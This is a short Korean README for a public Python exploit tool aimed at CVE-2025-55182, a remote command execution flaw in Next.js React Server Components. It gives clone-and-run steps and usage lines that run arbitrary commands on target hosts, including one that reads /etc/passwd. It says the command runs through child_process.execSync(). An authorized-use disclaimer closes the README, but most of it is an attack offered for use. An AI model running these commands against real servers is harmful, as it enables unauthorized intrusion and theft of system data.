
Next.js 취약점 CVE-2025-55182를 위한 익스플로잇 도구로, React Server Components의 poisoning prototype을 통해 원격 명령 실행을 허용합니다.
HTTP/HTTPS를 지원하는 Next.js React Server Components RCE 취약점을 위한 Python 익스플로잇.
# Clone & run
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
승인된 보안 테스트 전용입니다.
소유한 시스템이나 테스트에 대한 명시적 허가를 받은 시스템에서만 사용하십시오. 불법 활동에 절대 사용하지 마십시오.
child_process.execSync()를 통해 RCE 트리거MIT 라이선스 - LICENSE 파일 참조
면책 조항: 교육 목적으로만 사용하십시오. 항상 적절한 승인을 받으십시오.
마지막 업데이트: 2025년 2월 8일
버전: 2.0.0
유지 관리자: BrianLopezM99